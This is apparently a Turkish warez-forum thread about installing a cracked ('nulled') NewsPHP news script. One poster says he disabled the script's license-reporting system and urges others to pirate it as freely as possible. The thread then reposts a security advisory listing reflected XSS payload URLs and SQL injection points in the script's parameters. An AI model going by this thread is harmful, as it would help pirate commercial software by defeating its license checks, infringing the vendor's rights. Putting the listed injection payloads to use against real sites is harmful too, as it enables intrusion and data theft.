ahsap' Alıntı:arkadaşlar eksik dosya yoktur ben localden kurdum dostum localhost ,root,123456,newsphp, bunları değiştirmelisin kendine göre not defterinde denenmiştir gavur gibi çalışıyor
Hocam onları biliyorumda documentation nasıl olacak die somuştum bu arada scripti kurdum resim ekleme olayını halledemedim benahsap' Alıntı:arkadaşlar eksik dosya yoktur ben localden kurdum dostum localhost ,root,123456,newsphp, bunları değiştirmelisin kendine göre not defterinde denenmiştir gavur gibi çalışıyor
eMachine' Alıntı:Foussa:
Modifiye ettigin dosyalari (belirli hatalari gidermek icin) benimle paylasirsan sana daha cok null yardimi yaparim. Sitende hala ekiskler var su an ihbar sistemi acik newsphp'ye direk ihbar gönderiyor sistemin. Onu ben kapattim.
Ihbar gitmesine ragmen NewsPhp sahipleri su an islem yapmiyor cunku sitelerinde SATIS bir sureligine durdurulmus. Ayni zamanda POLICY olayi yok. Yani kanuni yasal uyarilar yok. Bu da demektir ki nullayin nullayabildiginiz kadar enayi mali guzeldir
Ayni zamanda siteni Turkceye de ceviririm, dil dosyasini Turkcesini burada paylasirim. Rusca+Almanca da yapabilirim. Ve Hatta Fince
MSN ve Email adresim: [email protected]
http://newsphp.com
Cross Site Scripting (XSS)
------------------
http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3E&where=1
http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
http://target.xx/index.php?cat_id='%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
http://target.xx/index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
http://target.xx/index.php?tim=%22%3E%3Cscript%3Ealert('Ellipsis%20Security%20Test')%3C/script%3E
http://target.xx/index.php?id=%3Cimg%20src=javascript:alert(%22EllipsisSecuritTest%22)%3E
-------------
SQL injection
http://target.xx/?words='[SQL]
http://target.xx/?words=%27[SQL]&where=1
http://target.xx/index.php?id='[SQL]
http://target.xx/index.php?topmenuitem='[SQL]
http://target.xx/index.php?cat_id='[SQL]
http://target.xx/index.php?words='[SQL]&where=1
http://target.xx/inc/rss_feed.php?category='[SQL]&amount=10
-----------------
Ellipsis Security
http://ellsec.org